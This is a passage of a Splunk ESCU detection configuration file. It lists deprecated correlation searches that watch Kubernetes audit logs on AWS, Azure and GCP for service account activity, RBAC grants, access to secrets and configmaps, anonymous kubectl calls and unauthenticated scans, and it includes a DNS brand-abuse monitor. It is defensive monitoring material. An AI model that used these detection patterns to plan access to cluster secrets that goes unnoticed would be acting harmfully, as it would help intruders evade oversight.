`aws_cloudwatchlogs_eks` user.groups{}=system:serviceaccounts responseStatus.status = Failure | table sourceIPs{} user.username userAgent verb responseStatus.status requestURI | `kubernetes_aws_detect_service_accounts_forbidden_failure_access_filter` [ESCU - Kubernetes Azure active service accounts by pod namespace - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes service accounts,accessing pods and namespaces by IP address and verb action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on Kubernetes service accounts,accessing pods and namespaces by IP address and verb action.escu.how_to_implement = You must install the Add-on for Microsoft Cloud Services and Configure Kube-Audit data diagnostics action.escu.known_false_positives = Not all service accounts interactions are malicious. Analyst must consider IP and verb context when trying to detect maliciousness. action.escu.creation_date = 2020-05-26 action.escu.modification_date = 2020-05-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Azure active service accounts by pod namespace - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Sensitive Role Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes Azure active service accounts by pod namespace - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Role Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kubernetes_azure` category=kube-audit | spath input=properties.log | search user.groups{}=system:serviceaccounts* OR user.username=system.anonymous OR annotations.authorization.k8s.io/decision=allow | table sourceIPs{} user.username userAgent verb responseStatus.reason responseStatus.status properties.pod objectRef.namespace | top sourceIPs{} user.username verb responseStatus.status properties.pod objectRef.namespace |`kubernetes_azure_active_service_accounts_by_pod_namespace_filter` [ESCU - Kubernetes Azure detect RBAC authorization by account - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes RBAC authorizations by accounts, this search can be modified by adding rare or top to see both extremes of RBAC by accounts occurrences action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on Kubernetes RBAC authorizations by accounts, this search can be modified by adding rare or top to see both extremes of RBAC by accounts occurrences action.escu.how_to_implement = You must install the Add-on for Microsoft Cloud Services and Configure Kube-Audit data diagnostics action.escu.known_false_positives = Not all RBAC Authorications are malicious. RBAC authorizations can uncover malicious activity specially if sensitive Roles have been granted. action.escu.creation_date = 2020-05-26 action.escu.modification_date = 2020-05-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Azure detect RBAC authorization by account - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Sensitive Role Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes Azure detect RBAC authorization by account - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Role Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kubernetes_azure` category=kube-audit | spath input=properties.log | search annotations.authorization.k8s.io/reason=* | table sourceIPs{} user.username userAgent annotations.authorization.k8s.io/reason |stats count by user.username annotations.authorization.k8s.io/reason | rare user.username annotations.authorization.k8s.io/reason |`kubernetes_azure_detect_rbac_authorization_by_account_filter` [ESCU - Kubernetes Azure detect sensitive object access - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes accounts accessing sensitve objects such as configmpas or secrets action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on Kubernetes accounts accessing sensitve objects such as configmpas or secrets action.escu.how_to_implement = You must install the Add-on for Microsoft Cloud Services and Configure Kube-Audit data diagnostics action.escu.known_false_positives = Sensitive object access is not necessarily malicious but user and object context can provide guidance for detection. action.escu.creation_date = 2020-05-20 action.escu.modification_date = 2020-05-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Azure detect sensitive object access - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Sensitive Object Access Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes Azure detect sensitive object access - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Object Access Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kubernetes_azure` category=kube-audit | spath input=properties.log| search objectRef.resource=secrets OR configmaps user.username=system.anonymous OR annotations.authorization.k8s.io/decision=allow |table user.username user.groups{} objectRef.resource objectRef.namespace objectRef.name annotations.authorization.k8s.io/reason |dedup user.username user.groups{} |`kubernetes_azure_detect_sensitive_object_access_filter` [ESCU - Kubernetes Azure detect sensitive role access - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes accounts accessing sensitve objects such as configmpas or secrets action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on Kubernetes accounts accessing sensitve objects such as configmpas or secrets action.escu.how_to_implement = You must install the Add-on for Microsoft Cloud Services and Configure Kube-Audit data diagnostics action.escu.known_false_positives = Sensitive role resource access is necessary for cluster operation, however source IP, namespace and user group may indicate possible malicious use. action.escu.creation_date = 2020-05-20 action.escu.modification_date = 2020-05-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Azure detect sensitive role access - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Sensitive Role Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes Azure detect sensitive role access - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Role Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kubernetes_azure` category=kube-audit | spath input=properties.log| search objectRef.resource=clusterroles OR clusterrolebindings | table sourceIPs{} user.username user.groups{} objectRef.namespace requestURI annotations.authorization.k8s.io/reason | dedup user.username user.groups{} |`kubernetes_azure_detect_sensitive_role_access_filter` [ESCU - Kubernetes Azure detect service accounts forbidden failure access - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes service accounts with failure or forbidden access status action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on Kubernetes service accounts with failure or forbidden access status action.escu.how_to_implement = You must install the Add-on for Microsoft Cloud Services and Configure Kube-Audit data diagnostics action.escu.known_false_positives = This search can give false positives as there might be inherent issues with authentications and permissions at cluster. action.escu.creation_date = 2020-05-20 action.escu.modification_date = 2020-05-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Azure detect service accounts forbidden failure access - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Sensitive Object Access Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes Azure detect service accounts forbidden failure access - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Object Access Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kubernetes_azure` category=kube-audit | spath input=properties.log | search user.groups{}=system:serviceaccounts* responseStatus.reason=Forbidden | table sourceIPs{} user.username userAgent verb responseStatus.reason responseStatus.status properties.pod objectRef.namespace |`kubernetes_azure_detect_service_accounts_forbidden_failure_access_filter` [ESCU - Kubernetes Azure detect suspicious kubectl calls - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on rare Kubectl calls with IP, verb namespace and object access context action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on rare Kubectl calls with IP, verb namespace and object access context action.escu.how_to_implement = You must install the Add-on for Microsoft Cloud Services and Configure Kube-Audit data diagnostics action.escu.known_false_positives = Kubectl calls are not malicious by nature. However source IP, verb and Object can reveal potential malicious activity, specially suspicious IPs and sensitive objects such as configmaps or secrets action.escu.creation_date = 2020-05-26 action.escu.modification_date = 2020-05-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Azure detect suspicious kubectl calls - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Sensitive Object Access Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes Azure detect suspicious kubectl calls - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Object Access Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kubernetes_azure` category=kube-audit | spath input=properties.log | spath input=responseObject.metadata.annotations.kubectl.kubernetes.io/last-applied-configuration | search userAgent=kubectl* sourceIPs{}!=127.0.0.1 sourceIPs{}!=::1 | table sourceIPs{} verb userAgent user.groups{} objectRef.resource objectRef.namespace requestURI | rare sourceIPs{} verb userAgent user.groups{} objectRef.resource objectRef.namespace requestURI |`kubernetes_azure_detect_suspicious_kubectl_calls_filter` [ESCU - Kubernetes Azure pod scan fingerprint - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information of unauthenticated requests via source IP user agent, request URI and response status data against Kubernetes cluster pod in Azure action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information of unauthenticated requests via source IP user agent, request URI and response status data against Kubernetes cluster pod in Azure action.escu.how_to_implement = You must install the Add-on for Microsoft Cloud Services and Configure Kube-Audit data diagnostics action.escu.known_false_positives = Not all unauthenticated requests are malicious, but source IPs, userAgent, verb, request URI and response status will provide context. action.escu.creation_date = 2020-05-20 action.escu.modification_date = 2020-05-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Azure pod scan fingerprint - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Scanning Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes Azure pod scan fingerprint - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Scanning Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kubernetes_azure` category=kube-audit | spath input=properties.log | search responseStatus.code=401 | table sourceIPs{} userAgent verb requestURI responseStatus.reason properties.pod |`kubernetes_azure_pod_scan_fingerprint_filter` [ESCU - Kubernetes Azure scan fingerprint - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information of unauthenticated requests via source IP user agent, request URI and response status data against Kubernetes cluster in Azure action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information of unauthenticated requests via source IP user agent, request URI and response status data against Kubernetes cluster in Azure action.escu.how_to_implement = You must install the Add-on for Microsoft Cloud Services and Configure Kube-Audit data diagnostics action.escu.known_false_positives = Not all unauthenticated requests are malicious, but source IPs, userAgent, verb, request URI and response status will provide context. action.escu.creation_date = 2020-05-19 action.escu.modification_date = 2020-05-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Azure scan fingerprint - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Scanning Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes Azure scan fingerprint - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Scanning Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kubernetes_azure` category=kube-audit | spath input=properties.log | search responseStatus.code=401 | table sourceIPs{} userAgent verb requestURI responseStatus.reason |`kubernetes_azure_scan_fingerprint_filter` [ESCU - Kubernetes GCP detect most active service accounts by pod - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes service accounts,accessing pods by IP address, verb and decision action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on Kubernetes service accounts,accessing pods by IP address, verb and decision action.escu.how_to_implement = You must install splunk GCP add on. This search works with pubsub messaging service logs action.escu.known_false_positives = Not all service accounts interactions are malicious. Analyst must consider IP, verb and decision context when trying to detect maliciousness. action.escu.creation_date = 2020-07-10 action.escu.modification_date = 2020-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes GCP detect most active service accounts by pod - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Sensitive Role Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes GCP detect most active service accounts by pod - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Role Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `google_gcp_pubsub_message` data.protoPayload.request.spec.group{}=system:serviceaccounts | table src_ip src_user http_user_agent data.protoPayload.request.spec.nonResourceAttributes.verb data.labels.authorization.k8s.io/decision data.protoPayload.response.spec.resourceAttributes.resource | top src_ip src_user http_user_agent data.labels.authorization.k8s.io/decision data.protoPayload.response.spec.resourceAttributes.resource |`kubernetes_gcp_detect_most_active_service_accounts_by_pod_filter` [ESCU - Kubernetes GCP detect RBAC authorizations by account - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes RBAC authorizations by accounts, this search can be modified by adding top to see both extremes of RBAC by accounts occurrences action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on Kubernetes RBAC authorizations by accounts, this search can be modified by adding top to see both extremes of RBAC by accounts occurrences action.escu.how_to_implement = You must install splunk AWS add on for GCP. This search works with pubsub messaging service logs action.escu.known_false_positives = Not all RBAC Authorications are malicious. RBAC authorizations can uncover malicious activity specially if sensitive Roles have been granted. action.escu.creation_date = 2020-07-11 action.escu.modification_date = 2020-07-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes GCP detect RBAC authorizations by account - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Sensitive Role Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes GCP detect RBAC authorizations by account - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Role Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `google_gcp_pubsub_message` data.labels.authorization.k8s.io/reason=ClusterRoleBinding OR Clusterrole | table src_ip src_user data.labels.authorization.k8s.io/decision data.labels.authorization.k8s.io/reason | rare src_user data.labels.authorization.k8s.io/reason |`kubernetes_gcp_detect_rbac_authorizations_by_account_filter` [ESCU - Kubernetes GCP detect sensitive object access - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes accounts accessing sensitve objects such as configmaps or secrets action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on Kubernetes accounts accessing sensitve objects such as configmaps or secrets action.escu.how_to_implement = You must install splunk add on for GCP . This search works with pubsub messaging service logs. action.escu.known_false_positives = Sensitive object access is not necessarily malicious but user and object context can provide guidance for detection. action.escu.creation_date = 2020-07-11 action.escu.modification_date = 2020-07-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes GCP detect sensitive object access - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Sensitive Object Access Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes GCP detect sensitive object access - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Object Access Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `google_gcp_pubsub_message` data.protoPayload.authorizationInfo{}.resource=configmaps OR secrets | table data.protoPayload.requestMetadata.callerIp src_user data.resource.labels.cluster_name data.protoPayload.request.metadata.namespace data.labels.authorization.k8s.io/decision | dedup data.protoPayload.requestMetadata.callerIp src_user data.resource.labels.cluster_name |`kubernetes_gcp_detect_sensitive_object_access_filter` [ESCU - Kubernetes GCP detect sensitive role access - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes accounts accessing sensitve objects such as configmpas or secrets action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on Kubernetes accounts accessing sensitve objects such as configmpas or secrets action.escu.how_to_implement = You must install splunk add on for GCP. This search works with pubsub messaging servicelogs. action.escu.known_false_positives = Sensitive role resource access is necessary for cluster operation, however source IP, user agent, decision and reason may indicate possible malicious use. action.escu.creation_date = 2020-07-11 action.escu.modification_date = 2020-07-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes GCP detect sensitive role access - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Sensitive Role Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes GCP detect sensitive role access - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Role Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `google_gcp_pubsub_message` data.labels.authorization.k8s.io/reason=ClusterRoleBinding OR Clusterrole dest=apis/rbac.authorization.k8s.io/v1 src_ip!=::1 | table src_ip src_user http_user_agent data.labels.authorization.k8s.io/decision data.labels.authorization.k8s.io/reason | dedup src_ip src_user |`kubernetes_gcp_detect_sensitive_role_access_filter` [ESCU - Kubernetes GCP detect service accounts forbidden failure access - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes service accounts with failure or forbidden access status, this search can be extended by using top or rare operators to find trends or rarities in failure status, user agents, source IPs and request URI action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on Kubernetes service accounts with failure or forbidden access status, this search can be extended by using top or rare operators to find trends or rarities in failure status, user agents, source IPs and request URI action.escu.how_to_implement = You must install splunk add on for GCP. This search works with pubsub messaging service logs. action.escu.known_false_positives = This search can give false positives as there might be inherent issues with authentications and permissions at cluster. action.escu.creation_date = 2020-06-23 action.escu.modification_date = 2020-06-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes GCP detect service accounts forbidden failure access - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Sensitive Object Access Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes GCP detect service accounts forbidden failure access - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Object Access Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `google_gcp_pubsub_message` system:serviceaccounts data.protoPayload.response.status.allowed!=* | table src_ip src_user http_user_agent data.protoPayload.response.spec.resourceAttributes.namespace data.resource.labels.cluster_name data.protoPayload.response.spec.resourceAttributes.verb data.protoPayload.request.status.allowed data.protoPayload.response.status.reason data.labels.authorization.k8s.io/decision | dedup src_ip src_user | `kubernetes_gcp_detect_service_accounts_forbidden_failure_access_filter` [ESCU - Kubernetes GCP detect suspicious kubectl calls - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on anonymous Kubectl calls with IP, verb namespace and object access context action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on anonymous Kubectl calls with IP, verb namespace and object access context action.escu.how_to_implement = You must install splunk add on for GCP. This search works with pubsub messaging logs. action.escu.known_false_positives = Kubectl calls are not malicious by nature. However source IP, source user, user agent, object path, and authorization context can reveal potential malicious activity, specially anonymous suspicious IPs and sensitive objects such as configmaps or secrets action.escu.creation_date = 2020-07-11 action.escu.modification_date = 2020-07-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes GCP detect suspicious kubectl calls - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Sensitive Object Access Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes GCP detect suspicious kubectl calls - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Object Access Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `google_gcp_pubsub_message` data.protoPayload.requestMetadata.callerSuppliedUserAgent=kubectl* src_user=system:unsecured OR src_user=system:anonymous | table src_ip src_user data.protoPayload.requestMetadata.callerSuppliedUserAgent data.protoPayload.authorizationInfo{}.granted object_path |dedup src_ip src_user |`kubernetes_gcp_detect_suspicious_kubectl_calls_filter` [ESCU - Monitor DNS For Brand Abuse - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for DNS requests for faux domains similar to the domains that you want to have monitored for abuse. action.escu.mappings = {"cis20": ["CIS 13"], "nist": ["DE.CM"]} action.escu.data_models = ["Network_Resolution"] action.escu.eli5 = This search looks for DNS requests for faux domains similar to the domains that you want to have monitored for abuse. action.escu.how_to_implement = You need to ingest data from your DNS logs. Specifically you must ingest the domain that is being queried and the IP of the host originating the request. Ideally, you should also be ingesting the answer to the query and the query type. This approach allows you to also create your own localized passive DNS capability which can aid you in future investigations. You also need to have run the search "ESCU - DNSTwist Domain Names", which creates the permutations of the domain that will be checked for. You also need the [`dnstwist`](https://gist.github.com/d1vious/c4c2aae7fa7d5cbb1f24adc5f6303ac1) custom command. action.escu.known_false_positives = None at this time action.escu.creation_date = 2017-09-23 action.escu.modification_date = 2017-09-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Monitor DNS For Brand Abuse - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Brand Monitoring"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Monitor DNS For Brand Abuse - Rule action.correlationsearch.annotations = {"analytic_story": ["Brand Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "nist": 